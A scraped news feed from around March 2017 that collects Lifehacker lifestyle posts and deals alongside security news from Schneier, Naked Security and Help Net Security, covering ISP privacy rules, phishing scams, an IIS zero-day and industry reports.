Make Brick Oven-Crispy Pizza On Your Countertop

The ability to create quality margherita pizza at home negates several of the few remaining reasons to leave the house.

The Cripsy Crust Pizza Maker is elementary by Breville standards, but delivers Breville-quality results just the same. The Pizza Maker is capable of a whopping 660 degrees, produced by top and bottom heating elements that surround its baking stone and replicate a traditional brick oven, yielding perfect pies up to 12" in diameter.

Controls are dead simple, with only an on/off knob and thickness dial to tweak, while a critical window on the top of the unit lets you check doneness. The whole process is pretty hard to screw up, and also delicious.

from Lifehacker http://ift.tt/2mVExsc

The Best Way to Reach Out to Someone You Ghosted

Nasal Sprays Could Be Making Your Allergies Worse

Gizmodo Watch This Industrious Badger Bury an Entire Cow by Itself | Deadspin Coastal Carolina Suspe

Gizmodo Watch This Industrious Badger Bury an Entire Cow by Itself | Deadspin Coastal Carolina Suspended Their Entire Cheerleading Squad And Won’t Say Why | Jezebel Fellow Dirt Bags: Turns Out It’s Okay If You Don’t Wash Your Legs | The Root Sean Hannity Is Garbage, but Not All Opinion Shows Are Trash |

from Lifehacker http://ift.tt/2mWNiGw

Friday Squid Blogging: 1887 Animal-Combat Print with Giant Squid

Great Victorian animal-combat scene featuring a giant squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

from Schneier on Security http://ift.tt/2oj7Xog

3-Ingredient Happy Hour: The Cherry Cola Kalimotxo

How’d You Do During the March Money Challenge?

Finding FBI Director James Comey's Twitter Account

An interesting story of uncovering an anonymous Internet social media account.

from Schneier on Security http://ift.tt/2oiEQ4c

Fellow Dirt Bags: Turns Out It's Okay If You Don't Wash Your Legs

Generating a Bunch Of "Internet Noise" Isn't Going to Hide Your Browsing Habits

News in brief: jets in near miss with drones; Germany plans cyber-command; adult sites move to HTTPS

You're Probably Going to Get a Tick This Summer. Good Luck.

Congress Removes FCC Privacy Protections on Your Internet Usage

Think about all of the websites you visit every day. Now imagine if the likes of Time Warner, AT&T, and Verizon collected all of your browsing history and sold it on to the highest bidder. That's what will probably happen if Congress has its way.

This week, lawmakers voted to allow Internet service providers to violate your privacy for their own profit. Not only have they voted to repeal a rule that protects your privacy, they are also trying to make it illegal for the Federal Communications Commission to enact other rules to protect your privacy online.

That this is not provoking greater outcry illustrates how much we've ceded any willingness to shape our technological future to for-profit companies and are allowing them to do it for us.

There are a lot of reasons to be worried about this. Because your Internet service provider controls your connection to the Internet, it is in a position to see everything you do on the Internet. Unlike a search engine or social networking platform or news site, you can't easily switch to a competitor. And there's not a lot of competition in the market, either. If you have a choice between two high-speed providers in the US, consider yourself lucky.

What can telecom companies do with this newly granted power to spy on everything you're doing? Of course they can sell your data to marketers -- and the inevitable criminals and foreign governments who also line up to buy it. But they can do more creepy things as well.

They can snoop through your traffic and insert their own ads. They can deploy systems that remove encryption so they can better eavesdrop. They can redirect your searches to other sites. They can install surveillance software on your computers and phones. None of these are hypothetical.

They're all things Internet service providers have done before, and they are some of the reasons the FCC tried to protect your privacy in the first place. And now they'll be able to do all of these things in secret, without your knowledge or consent. And, of course, governments worldwide will have access to these powers. And all of that data will be at risk of hacking, either by criminals and other governments.

Telecom companies have argued that other Internet players already have these creepy powers -- although they didn't use the word "creepy" -- so why should they not have them as well? It's a valid point.

Surveillance is already the business model of the Internet, and literally hundreds of companies spy on your Internet activity against your interests and for their own profit.

Your e-mail provider already knows everything you write to your family, friends, and colleagues. Google already knows our hopes, fears, and interests, because that's what we search for.

Your cellular provider already tracks your physical location at all times: it knows where you live, where you work, when you go to sleep at night, when you wake up in the morning, and -- because everyone has a smartphone -- who you spend time with and who you sleep with.

And some of the things these companies do with that power is no less creepy. Facebook has run experiments in manipulating your mood by changing what you see on your news feed. Uber used its ride data to identify one-night stands. Even Sony once installed spyware on customers' computers to try and detect if they copied music files.

Aside from spying for profit, companies can spy for other purposes. Uber has already considered using data it collects to intimidate a journalist. Imagine what an Internet service provider can do with the data it collects: against politicians, against the media, against rivals.

Of course the telecom companies want a piece of the surveillance capitalism pie. Despite dwindling revenues, increasing use of ad blockers, and increases in clickfraud, violating our privacy is still a profitable business -- especially if it's done in secret.

The bigger question is: why do we allow for-profit corporations to create our technological future in ways that are optimized for their profits and anathema to our own interests?

When markets work well, different companies compete on price and features, and society collectively rewards better products by purchasing them. This mechanism fails if there is no competition, or if rival companies choose not to compete on a particular feature. It fails when customers are unable to switch to competitors. And it fails when what companies do remains secret.

Unlike service providers like Google and Facebook, telecom companies are infrastructure that requires government involvement and regulation. The practical impossibility of consumers learning the extent of surveillance by their Internet service providers, combined with the difficulty of switching them, means that the decision about whether to be spied on should be with the consumer and not a telecom giant. That this new bill reverses that is both wrong and harmful.

Today, technology is changing the fabric of our society faster than at any other time in history. We have big questions that we need to tackle: not just privacy, but questions of freedom, fairness, and liberty. Algorithms are making decisions about policing, healthcare.

Driverless vehicles are making decisions about traffic and safety. Warfare is increasingly being fought remotely and autonomously. Censorship is on the rise globally. Propaganda is being promulgated more efficiently than ever. These problems won't go away. If anything, the Internet of things and the computerization of every aspect of our lives will make it worse.

In today's political climate, it seems impossible that Congress would legislate these things to our benefit. Right now, regulatory agencies such as the FTC and FCC are our best hope to protect our privacy and security against rampant corporate power. That Congress has decided to reduce that power leaves us at enormous risk.

It's too late to do anything about this bill -- Trump will certainly sign it -- but we need to be alert to future bills that reduce our privacy and security.

This post previously appeared on the Guardian.

EDITED TO ADD: Former FCC Commissioner Tom Wheeler wrote a good op-ed on the subject. And here's an essay laying out what this all means to the average Internet user.

from Schneier on Security http://ift.tt/2ojHGqq

Today's Best Deals: Hard Drive Gold Box, Anker PowerCore Fusion, $1 Dash Buttons, and More

Text message scam from the Motor Registry – how not to get stung

As far as the crooks are concerned, yesterday’s “scam that knows where you live” attack was just not enough for people in the UK.

Today, they’re taking the name of the UK’s Motor Registry in vain.

Known colloquially as the DVLA (pronounced deevee-ellay), short for Driver and Vehicle Licensing Agency, it’s based in Swansea in Wales.

The city of Swansea, in turn, is metaphorically associated with things like speeding fines, penalty points, licence renewals… and, from time to time, refunds for overpaid vehicle tax.

Interestingly, the UK no longer issues tax disks to display on a car’s windscreen – there’s so much automated surveillance these days using Automatic Number Plate Recognition (APNR) cameras that there’s little purpose in having a window sticker to “prove” you’ve paid.

Anyway, jf you sell or scrap a car, any tax you paid in advance for the current year will be refunded automatically, so many people will be familiar with getting money back from Swansea.

Some people may very well have had trouble getting their refund, for example if there was a problem with the bank account from which they originally paid in the money, or if they aren’t at the address on record at the DVLA, causing the refund cheque to be returned undelivered.

So an SMS looking like this could easily pass muster:

But look carefully, and you’ll realise that even though the URL contains the sort of components you’d expect in the real thing, notably gov DOT uk, the end of the server name is actually a domain based in Palau (.PW).

Palau is a tiny Pacific island country of just 20,000 people that uses its short-and-sweet domain names as a source of global revenue. (PW is branded as standing for “Professional Web”, although this particular domain name is anything but.)

If you click through, you’ll see a web page that seems realistic enough at first sight, although the “facts” are bogus (you don’t get offered a refund and then claim it), and both the grammar and style are sub-standard for Her Majesty’s Government:

If you click [Get Started->], you’re straight into a phishing page that believably asks for sufficiently many personal details that the crooks could fleece you right away if you were to fill them in:

What to do?

• Don’t rely on links to websites sent in emails, SMSs or other forms of electronic message.

Find the official website yourself – for the DVLA, for instance, look it up on an official document you’ve received in the past – and go there of your own accord. (Here’s a free hint for the DVLA: it wouldn’t do any harm to print the DVLA’s official URL somewhere on every UK driving licence, making an excellent and official way to find it.)

• If you’re offered a financial refund, check the official website to find out how refunds really work.

For example, the DVLA issues refunds automatically in one of just two ways: by reversing a Direct Debit, if you have one set up; or by mailing a cheque to the address you have on record.

• Don’t be misled by domain names because they start with the text you expect – it’s the right-hand end that counts.

For example, Sophos owns sophos.com, which means we can use any and all subdomain names that end with that text string, such as partners.sophos.com, nakedsecurity.sophos.com, and so on. Many browsers deliberately highlight the text at the right-hand end, to remind you to look there first.

• If you’re asked for personal data like your address and credit card number on an unencrypted web page, don’t enter it.

Crooks can easily get certificates for HTTPS these days, so just the presence of a padlock in the address bar doesn’t confirm you are at the right site. But the absence of a padlock on a page that wants a credit card is always wrong, even if it’s the right site. (Why trust a company that clearly doesn’t take even the most basic precautions with your personal data?)

• Report scams and dodgy SMSs like this to your mobile operator.

Having real reports and genuine complaints “from the wild” makes it possible for the regulator to take action against scammers who might otherwise get away with it. Some scams are on the grey edge of legality, and it’s community consensus that helps the regulators redefine the boundaries of acceptable text messaging behaviour.

Our parting shots

• When faced with a web link: think before you click.
• When faced with a web form: if in doubt, don’t give it out.

Follow @NakedSecurity
Follow @duckblog

from Naked Security http://ift.tt/2ohUuNA

Today's the Last Day To Snag Discounted USB-C Adapters From Apple

Why you shouldn’t chip in to buy politicians’ browsing histories

Deadspin The Best Thing About This Year’s WrestleMania Is A Brutally Personal Reality-TV Feud | Pale

Deadspin The Best Thing About This Year’s WrestleMania Is A Brutally Personal Reality-TV Feud | Paleofuture 9 More Horrific April Fools’ Day Pranks of the 19th Century | Jezebel Don’t Play Yaself Today | The Grapevine This Racist Promposal Gotta Go: ‘You May Be Picking Cotton, but We’re Picking You to Go to Prom With Us’ |

from Lifehacker http://ift.tt/2nSq5EK

Anker's PowerCore Fusion Is a Battery Pack and a Wall Charger - Get It For $20 [Exclusive]

How to Hide Online Better Than the Director of the FBI

Prep Cook: Chili Garlic Tofu Bowls, Black Bean Soup, and More

Can't Pay Your Car Loan? Here's What to Do So You Don't Default

Store All of Your Photos, Movies, and Even PS4 Games With Amazon's One-Day Hard Drive Sale

Not just a load of old COBOLers: systems are still running on old code

Doomsday Prep For Non-Paranoid People

Android under siege from malware – here’s how to protect your phone

Review: Data Breach Preparation and Response

About the author

Kevvie Fowler is a Partner and National Cyber Response Leader for KPMG Canada and has over 19 years of IT security and forensics experience. He is a SANS lethal forensicator and sits on the SANS Advisory Board where he guides the direction of emerging security and forensics research.

Inside Data Breach Preparation and Response

Despite the fact that only one author is named on the book’s cover, this is a book that’s been compiled with the help of five other experts in several fields: crisis and risk management, technology law, cyber threat analysis and forensics, and cyber insurance.

The book starts with a chapter defining what is a data breach, the data breach lifecycle, and the most typical sources of data breaches. Readers will get a short overview of what kind of data attackers are after, what they do with it, and where they sell it. Finally, it includes an overview of the various costs that are usually associated with a data breach, helpful tips on how to minimize them, as well as a list of the most common challenges encountered when managing a breach.

The next two chapters deal with the preparation to develop and the actually development of a Computer Security Incident Response (CSIR) Plan. They give insight into things like how to gain executive support, build a CSIR team, identify critical assets and breach scenarios, evaluate the extent of the need for cyber insurance, but also how to develop the company’s data breach response policy, and how to develop and test the CSIR plan (testing it is crucial, as it leads to improvement and the plan keeping pace with the evolution of the organization, the technology, and cyber criminals’ attack techniques and tactics). Here the readers will see why the preparation for the plan is more time-consuming than the actual formulation of the plan, and will discover all the big and small details the CSIR plan must cover.

Then comes the breach investigation – how to start it, how to choose which third parties to involve (and how to manage them), how to determine the scope of the breach – and breach containment (including how to remove sensitive information leaked online).

Communication before, during and after a breach gets a whole chapter, and rightly so – preparation in critical, and here you’ll get an insight in how to do it right, and ultimately tailor the message for each party involved. Next, the authors address the issue of restoring business services after a breach, and restoring trust inside the company and, at the very end, how to prepare for breach litigation, and recommendations on how to avoid it altogether.

IT security specialists have already internalized and made peace with the fact that data breaches are almost inevitable, and this book will, I believe, be a welcome addition to their shelf.

The topic is covered beautifully and thoroughly, and approached from many different angles. Despite that, the language and explanations are easy to grasp fo everyone, and not just infosec pros. There are several chunks of this book that business managers and executives should definitely read, as to make their choices more informed.

Rare are the authors that know how to explain complex topics in a simple manner and know how to avoid boring the reader, but these authors belong to that category.

from Help Net Security http://ift.tt/2nRd4LO

People are still the biggest security threat to any organization

Despite an increase in spending and investment in deterrence tactics and detection tools, insider threats continue to cause harm to all types of organizations.

A new report suggests that, although funding is increasing, inadequate resources are being allotted to predictive risk analytics — a critical component of mitigating insider threats. This lack of analytics investment comes at a price, as insider attacks continue to be costly.

“Ask any cybersecurity specialist to name the biggest security threat to an organization and they’ll tell you it’s people,” said Haystax CEO Bryan Ware. Yet despite increased funding on insider threat programs, he added, the problem shows no signs of abating. “Training programs and network controls are important, but without analytics that produce actionable intelligence, organizations are often left in the dark until after a malicious insider does damage.”

Using crowd-based research in partnership with the 300,000-plus members of the Information Security Community on LinkedIn, the report found nearly three-quarters (74 percent) of organizations feel vulnerable to insider threats, a significant seven-percent increase over last year.

Of the organizations that are investing in insider threat mitigation, 61 percent are focusing mostly on deterrence (e.g., access controls, encryption, policies, etc.) and 49 percent on detection (e.g., monitoring, intrusion detection systems, etc.) — while 35 percent employ forensics and analysis systems like security information and event management (SIEM) tools.

Most survey respondents (67 percent) indicate that because insiders already have credentialed access to their networks and services, they are much more difficult to detect and deter than external threats. But only 42 percent of organizations say they are regularly monitoring user behavior while 21 percent do none at all.

Insider threat detection has improved, with 46 percent of respondents believing they could detect an attack within a day at most. What’s more, 68 percent are confident in their ability to recover from an attack in a week or less, up 20 percent over last year’s survey. However, three-fourths estimate remediation costs could be up to $500,000, with the other 25 percent believing costs could exceed that amount — and perhaps reach into the millions of dollars.

from Help Net Security http://ift.tt/2nG7bAH

New infosec products of the week​: March 31, 2017

Waterfall Security, CNA Hardy and THB partner to create global industrial cyber proposition

THB, CNA Hardy and leading cybersecurity specialist Waterfall Security Solutions have entered into a partnership to provide a new cyber security protection package for industrial businesses globally.

“This new cyber insurance partnership is a global precedent on many levels. First, it documents enough concern around increasing cyberattacks on industrial facilities, a clear sign for potential high profits from financial institutions. Secondly, it demonstrates the highest level of trust possible from two Lloyd’s of London companies, CNA/Hardy and THB, in our Unidirectional Gateway technology. That is a huge statement for Waterfall, and for the certainty of using Unidirectional Gateways as the best defense to prevent cyberattacks from entering industrial control systems,” Lior Frenkel, CEO at Waterfall Security told Help Net Security.

ViaSat delivers NSA-certified Type 1 100 Gbps ethernet encryptor

ViaSat announced the ViaSat KG-142, a 100 Gbps Type 1 Ethernet encryptor, is now NSA-certified. Building on ViaSat’s IP encryption heritage, the ViaSat KG-142 delivers the encryption power of 10 separate 10 Gbps encryptors in a single 1U rack unit, increasing scalability, and minimizing network overhead for Layer 2 Ethernet communications up to TS/SCI (Top Secret / Sensitive Compartmented Information).

Qualys delivers continuous security and compliance to Google Cloud Platform customers

Qualys has extended its single-pane view of security and compliance posture into Google Cloud Platform (GCP). Users can now scan their GCP workloads, along with all other global elastic-cloud and on-premise assets, from within the Qualys Cloud Platform. Qualys Virtual Scanner Appliance (QVSA) can now be directly deployed from the Google Cloud Launcher to GCP. With a single click, GCP users can create QVSA instances for Google Compute Engine (GCE) across all GCP regions. They can also embed Qualys Cloud Agents into their GCE images for a continuous view of security and compliance state.

ClearSky Data expands backup, disaster recovery capabilities

ClearSky Data has expanded its data protection capabilities to deliver complete offsite backup and disaster recovery (DR) as part of its fully managed service. With ClearSky Data, customers only pay for a single, fully protected copy of their data that is accessible anywhere – on-premises or in the cloud. Organizations can now eliminate secondary infrastructure for business continuity and DR, including backup licenses and management, making hybrid cloud backup and DR a reality.

ManageEngine adds two-factor authentication to ADManager Plus

ManageEngine announced the addition of two-factor authentication (2FA) support in ADManager Plus, its Active Directory (AD) management and reporting solution. The company also announced the addition of user provisioning in the ADManager Plus iOS app. The addition of 2FA support establishes an extra layer of security around ADManager Plus logins while user provisioning support makes the iOS app a complete user life cycle management tool for on-the-go AD admins.

Core Security expands CoreLabs’ research

Core Security expanded CoreLabs, now a research team whose coverage holistically analyzes security attacks across attack vectors, exploits and vulnerabilities, device and identity configurations, and network traffic. The team now includes over 34 researchers around the world.

from Help Net Security http://ift.tt/2ofLk3V

Worldwide spending on security technology to reach $81.7 billion in 2017

A new update to the Worldwide Semiannual Security Spending Guide from IDC forecasts worldwide revenues for security-related hardware, software, and services will reach $81.7 billion in 2017, an increase of 8.2% over 2016.

Global spending on security solutions is expected to accelerate slightly over the next several years, achieving a compound annual growth rate (CAGR) of 8.7% through 2020 when revenues will be nearly $105 billion.

“The rapid growth of digital transformation is putting pressures on companies across all industries to proactively invest in security to protect themselves against known and unknown threats,” said Eileen Smith, program director, Customer Insights and Analysis. “On a global basis, the banking, discrete manufacturing, and federal/central government industries will spend the most on security hardware, software, and services throughout the 2015-2020 forecast. Combined, these three industries will deliver more than 30% of the worldwide total in 2017.”

In addition to the banking, discrete manufacturing, and federal/central government industries, three other industries (process manufacturing, professional services, and telecommunications) will each spend more than $5 billion on security products this year. These will remain the six largest industries for security-related spending throughout the forecast period, while a robust CAGR of 11.2% will enable telecommunications to move into the number 5 position in 2018. Following telecommunications, the industries with the next fastest five-year CAGRs are state/local government (10.2%), healthcare (9.8%), utilities (9.7%), and banking (9.5%).

Services will be the largest area of security-related spending throughout the forecast, led by three of the five largest technology categories: managed security services, integration services, and consulting services. Together, companies will spend nearly $31.2 billion, more than 38% of the worldwide total, on these three categories in 2017. Network security (hardware and software combined) will be the largest category of security-related spending in 2017 at $15.2 billion, while endpoint security software will be the third largest category at $10.2 billion.

The technology categories that will see the fastest spending growth over the 2015-2020 forecast period are:

• Device vulnerability assessment software (16.0% CAGR)
• Software vulnerability assessment (14.5% CAGR)
• Managed security services (12.2% CAGR)
• User behavioral analytics (12.2% CAGR)
• UTM hardware (11.9% CAGR).

From a geographic perspective, the United States will be the largest market for security products throughout the forecast. In 2017, the U.S. is forecast to see $36.9 billion in security-related investments. Western Europe will be the second largest market with spending of nearly $19.2 billion this year, followed by the Asia/Pacific (excluding Japan) region. Asia/Pacific (excluding Japan) will be the fastest growing region with a CAGR of 18.5% over the 2015-2020 forecast period, followed by the Middle East & Africa (MEA)(9.2% CAGR) and Western Europe (8.0% CAGR).

“European organizations show a strong focus on security matters with data, cloud, and mobile security being the top three security concerns. In this context, GDPR will drive up compliance-related projects significantly in 2017 and 2018, until organizations have found a cost-efficient and scalable way of dealing with data,” said Angela Vacca, senior research manager, Customer Insights and Analysis. “In particular, Western European utilities, professional services, and healthcare institutions will increase their security spending the most while the banking industry remains the largest market.”

From a company size perspective, large and very large businesses (those with more than 500 employees) will be responsible for roughly two thirds of all security-related spending throughout the forecast. IDC also expects very large businesses (more than 1,000 employees) to pass the $50 billion spending level in 2019. Small and medium businesses (SMBs) will also be a significant contributor to BDA spending with the remaining one third of worldwide revenues coming from companies with fewer than 500 employees.

from Help Net Security http://ift.tt/2nlH8uT

Gizmodo This Is Almost Certainly James Comey’s Twitter Account | Adequate Man What Does Mike Pence T

Gizmodo This Is Almost Certainly James Comey’s Twitter Account | Adequate Man What Does Mike Pence Think Happens At Restaurants? | Jezebel Other Parents Are the Worst Kind of Hell | The Root Tulsa, Okla., Officer Who Killed Terence Crutcher Says Race Had Nothing to Do With It |

from Lifehacker http://ift.tt/2on5W7B

These Are The Cars That Are Most Likely To Go Over 200,000 Miles

Save Nearly $30 On the GORUCK GR1, Our Readers' Newly Minted Favorite Backpack [Exclusive]

GORUCK’s military-inspired GR1 dominated this week’s Co-Op for the best everyday backpack, and they’re celebrating by offering our readers a rare 10% discount with promo code KINJAGORUCK10.

Now, even with the code, this is still a $267 backpack. I’m not blind to the fact that that’s a lot of money. But every GR1 is hand-built over the course of four hours in the USA, is covered by a lifetime warranty, and by basically all accounts is just incredibly well-made. There’s a very real chance that this will be the last backpack you ever have to buy.

Own one? Let us know what you think in the comments.

---

from Lifehacker http://ift.tt/2nkLYIO

How to Anonymize Your Browsing with a Tor-Powered Raspberry Pi

What to Do When You Get Stuck in a Twitter Reply-Allpocalypse

11 Things That Can Get You Kicked Off a Plane and How to Handle It

I'm Selling My Hot Hatchback For a Dadmobile! What Car Should I Buy?

IFTTT Adds Support for the iPhone Calendar and App Store

This Strength Workout Can Get You Closer to Your First Pull-Up

News in brief: tech firms ‘must do more’ on terror; data breaches shoot up; gloom at toxic online spaces

Stance Sends Your Message to Your Congressperson’s Voicemail, but Also to Everyone Else

Today's Best Deals: Amazon Jeans Sale, Razer Blowout, Ecobee3, and More

You Can Now Beg for Money on Facebook

PSA: Talk to Your Grandparents About Phone Tax Scams ASAP

Gizmodo Jeff Bezos Had a Good Ass Day | The Slot George W.

Gizmodo Jeff Bezos Had a Good Ass Day | The Slot George W. Bush Thought Donald Trump’s Inauguration Speech Was Some ‘Weird Shit’ Too | Deadspin Golden Knights Owner Wishes Las Vegas Didn’t Spend $750 Million On The Raiders | The Root The War at Morehouse |

from Lifehacker http://ift.tt/2nzfCMr

“Couple Workouts” Are the Answer to Exercising with Your Partner

Put Some New Pants on With Amazon's One-Day Denim Sale

It’s Not Very Common, But Yes, Student Loans Can Be Forgiven

When Meditation Doesn't Work, Try Journaling to Stay Sane

All Of Your Favorite Razer Gaming Gear Is On Sale In Amazon's Gold Box, Today Only

Let’s Encrypt issues certs to ‘PayPal’ phishing sites: how to protect yourself

Falling in love online? Don’t get caught out by the Tinder scammers

UK residents hit with extremely personalized scam emails

A compelling and potentially very successful email spam campaign is being leveraged against UK residents, warns Sophos researcher Paul Ducklin.

The email addresses the recipients by their first name, the name of the attached file is their last name, and the email body contains their exact address.

Add to this the claim that the sender has received a significant amount of personal information about the recipient and that this info was likely stolen in a hack, and one can see why many could be persuaded to download the attached file.

In this particular case, the grammar and spelling mistakes in the email body do not play a factor, as it’s possible that a well-meaning sender of such a warning is not a native English speaker.

If the recipient downloads and opens the attached Word file, he or she will be prompted to enter the password provided in the email, and to enable macros in order to view the document’s contents.

Unfortunately, this action allows the file to run a malicious macro program bundled in the file, and it will download what seems to be a GIF file. It is not: it contains an executable file – a Trojan that turns the victim’s file into a bot, and ropes it into a botnet.

As Ducklin noted, the malware included in the file can be easily changed, or the the current bot can download additional malware if so instructed by the attackers.

Needless to say, users would do well to ignore these emails. Some could (understandably) be worried about the fact that someone out there has much personal info about them, but if they are, it’s best to involve local law enforcement and ask for advice.

Still, pinpointing from where the scammers got the personal info used in the campaign is practically impossible.

“At least in the UK, many companies that collect addresses put them through some kind of standardisation algorithm to produce address data in the format preferred by the Post Office, so it can be hard to figure out the likely source of the breach,” the researcher pointed out.

from Help Net Security http://ift.tt/2nlSgsz

(IN)SECURE Magazine issue 53 released

(IN)SECURE Magazine is a free digital security publication discussing some of the hottest information security topics. Issue 53 has been released today.

Table of contents

• How to leverage the benefits of open source software in a secure way
• Antivirus 2017: Security with a hint of surveillance
• Evolving PKI for the Internet of Things
• 7 real-world steps to security nirvana
• The HTTPS interception dilemma: Pros and cons
• Deception security doesn’t have to be onerous or expensive
• Report: BSides Ljubljana 0x7E1
• 5 spring cleaning tips for your Identity and Access Management program

from Help Net Security http://ift.tt/2nyfLj8

Actively exploited zero-day in IIS 6.0 affects 60,000+ servers

Microsoft Internet Information Services (IIS) 6.0 sports a zero-day vulnerability (CVE-2017-7269) that was exploited in the wild last summer and is likely also being exploited by threat actors at this very moment.

It is a buffer overflow flaw in a function in the WebDAV service in IIS 6.0 in Microsoft Windows Server 2003 R2, and can be triggered by attackers sending a overlong IF header in a PROPFIND request.

Unfortunately, the flaw won’t be patched by Microsoft, because they stopped supporting Windows Server 2003 a few years ago (IIS 6.0 was included in the OS).

Shodan shows that there are a little over 600,000 publicly accessible IIS 6.0 servers on the Internet, and most of them are probably running on Windows Server 2003. Of these, a good 10 percent has WebDAV enabled to allow for remote web authoring, meaning that there are possibly millions of websites out there exposed to this exploit.

So what can be done about CVE-2017-7269?

The risk of exploitation can be mitigated by disabling the WebDAV service on the vulnerable IIS 6.0 installation, but not all administrators will want to do it.

Mitja Kolsek, CEO of Acros Security and co-founder at 0patch, offers another solution: a micropatch that should plug the hole.

The patch is free, and its source code open for inspection (you can view it here). For it to be delivered to the vulnerable machine admins will need to download and install a copy of the company’s 0patch Agent.

More technical details about the flaw can be found in this post by Trend Micro researchers, but the most important things to know right now are as follows:

• The flaw can be exploited remotely, and allows attackers to execute arbitrary code on a vulnerable machine
• A proof-of-concept exploit has been published on GitHub, so it’s highly likely that it is being repurposed by attackers and will be used soon (if it’s not already)
• The flaw affects 32-bit and 64-bit Windows Server 2003 with WebDAV functionality enabled. It doesn’t affect newer versions of IIS (7.0 or later) and newer versions of Windows Server.

from Help Net Security http://ift.tt/2niSvE1

Number of compromised records up 566% in 2016

The number of records compromised grew a historic 566 percent in 2016 from 600 million to more than 4 billion.

These leaked records include data cybercriminals have traditionally targeted like credit cards, passwords and personal health information, but IBM X-Force also noted a shift in cybercriminal strategies. In 2016, a number of significant breaches related to unstructured data such as email archives, business documents, intellectual property and source code were also compromised.

The IBM X-Force Threat Intelligence Index is comprised of observations from more than 8,000 monitored security clients in 100 countries and data derived from non-customer assets such as spam sensors and honeynets in 2016. IBM X-Force runs network traps around the world and monitors more than eight million spam and phishing attacks daily while analyzing more than 37 billion web pages and images.

“Cybercriminals continued to innovate in 2016 as we saw techniques like ransomware move from a nuisance to an epidemic,” said Caleb Barlow, VP of Threat Intelligence, IBM Security. “While the volume of records compromised last year reached historic highs, we see this shift to unstructured data as a seminal moment. The value of structured data to cybercriminals is beginning to wane as the supply outstrips the demand. Unstructured data is big-game hunting for hackers and we expect to see them monetize it this year in new ways.”

Spam surges on back of ransomware

In a separate study last year, IBM Security found 70 percent of businesses impacted by ransomware paid over $10,000 to regain access to business data and systems. In the first three months of 2016, the FBI estimated cybercriminals were paid a reported $209 million via ransomware. This would put criminals on pace to make nearly $1 billion from their use of the malware just last year.

The promise of profits and businesses increasing willingness to pay empowered cybercriminals to double down on ransomware in 2016. The primary delivery method for ransomware is via malicious attachments in spam emails. This fueled a 400 percent increase in spam year over year with roughly 44 percent of spam containing malicious attachments. Ransomware made up 85% of those malicious attachments in 2016.

Shift from healthcare back to financial services

In 2015, Healthcare was the most attacked industry with Financial Services falling to third, however, attackers in 2016 refocused back on Financial Services. While Financial Services was targeted the most by cyber-attacks last year, data from the X-Force report shows it was only third in compromised records. The lower success rate versus the high volume of attacks in Financial Services indicates that continued investment in sustained security practices likely helped protect financial institutions.

The healthcare industry continued to be beleaguered by a high number of incidents, although attackers focused on smaller targets resulting in a lower number of leaked records. In 2016, only 12 million records were compromised in healthcare – keeping it out of the top 5 most-breached industries. For perspective, nearly 100 million healthcare records were compromised in 2015 resulting in a 88 percent drop in 2016.

Information and communication services companies and government experienced the highest number of incidents and records breached in 2016.

• Information and Communications (3.4 billion records leaked and 85 breaches/incidents)
• Government (398 million records leaked and 39 breaches/incidents).

Good news for defensive strategies

The average IBM monitored security client organization experienced more than 54 million security events in 2016—only three percent more events than 2015. This was marked by a 12 percent decrease year-over-year in attacks. As security systems are further tuned and new innovations like cognitive systems grow, the number of incidents overall dropped 48 percent in 2016.

from Help Net Security http://ift.tt/2nxZNFx

How CIOs are shaping the future of work

IT leaders are poised to make radical changes in the workplace, but boardrooms are holding back progress by continuing to place too much emphasis on reducing costs and keeping the lights on, according to Fuze.

The global research reveals that 93 percent of IT leaders believe digital transformation should be a critical part of their roles and 47 percent want board-level executives to measure the IT function on its ability to innovate for the business. Yet today, 44 percent of IT leaders are measured on cost cutting, with the average IT department expected to reduce expenditure by 12 percent over the next five years.

IT teams are currently spending 83 percent of their time managing IT platforms and resolving user issues, and only 11 percent of their time planning future innovations. However, the majority of IT leaders see numerous opportunities to unleash their teams from the constraints of day-to-day operations. Eighty percent of IT leaders surveyed have named a cloud champion and 67 percent are actively looking to reduce application sprawl and time spent managing redundant technologies.

Looking ahead to 2020 and beyond, IT leaders see the imminent arrival of the app generation – those teenagers who have never known a world without smartphones and instant internet – as a positive driver for change as they enter the workplace. Three-quarters of IT leaders say younger generations will drive workplace innovation and today’s workforce agrees: 82 percent of workers say young people will help refresh approaches to technology.

Trends uncovered in the report include:

The rise of super-connected, yet super-mobile workforces

Eighty-three percent of workers believe they don’t need to be in an office to be productive and 43 percent of workers believe they would be more productive working from home than in the office. Employees will value flexible work as a necessity and expectation, rather than an option.

Consumer-like experiences in the workplace

Around half (48 percent) of today’s workers say their employer does not provide adequate technology and 75 percent of the app generation want to use the latest technology at work. Fifty-nine percent of IT leaders say that adopting new technologies is a priority. IT leaders will be expected to provide technologies with great user experiences, requiring cloud-based technologies that fit with the way employees want to work, interact, and collaborate.

Hybrid office spaces designed around the worker

Eighty-six percent of employees say face-to-face interaction will always be important for work and 71 percent of the app generation believe it is important to connect in person with coworkers. Offices will be designed around employees, with workspaces that bring together teams, spark conversation, and create the best ideas.

“IT leaders are dealing with a complex working environment, balancing the demands of multiple generations in the workplace while navigating the challenges of operational responsibilities, budget pressures, and customer expectations. Yet today’s IT leaders also understand this presents a fantastic opportunity to take the lead in shaping the future of work,” said Derek Yoo, CTO at Fuze.

from Help Net Security http://ift.tt/2ojMSap

Mastercard acquires NuData Security

Mastercard has entered into an agreement to acquire NuData Security, a technology company that helps businesses prevent online and mobile fraud using session and biometric indicators. Terms of the agreement were not disclosed.

Mastercard will build on its commitment to drive greater protection in the digital space, integrating NuData to its already robust suite of fraud management and security products. The acquisition will also strengthen its efforts around device-level security and authentication, enabling near real-time collaboration between issuers, merchants and processors.

“Securing all payments today and tomorrow remains a top priority for Mastercard,” said Ajay Bhalla, president of enterprise risk and security for Mastercard. “The addition of NuData will build on our layered security strategy to safeguard each and every transaction across the globe. The combination of session and biometric information will provide even richer context around potential cyber and device-specific threats, enabling us to deliver even greater trust and peace of mind.”

NuData’s flagship NuDetect product identifies authentic users from potential fraudsters based on their online, mobile app and smartphone interactions, flagging those that represent the highest risk. The technology assesses, scores and learns from each online or mobile transaction to enable merchants and issuers to make near real-time authorization decisions.

“We’re excited to join the Mastercard family,” said Michel Giasson, CEO, NuData. “For nearly a decade, we’ve worked to develop innovative solutions to help transform the way banks and merchants digitally interact with consumers. Those efforts will continue and accelerate through our collective enhanced capabilities to secure the digital landscape, while offering an enhanced user experience.”

from Help Net Security http://ift.tt/2oB1O3d

Congress Won't Protect Your Browsing History, So Do It Yourself With NordVPN For Under $4 Per Month

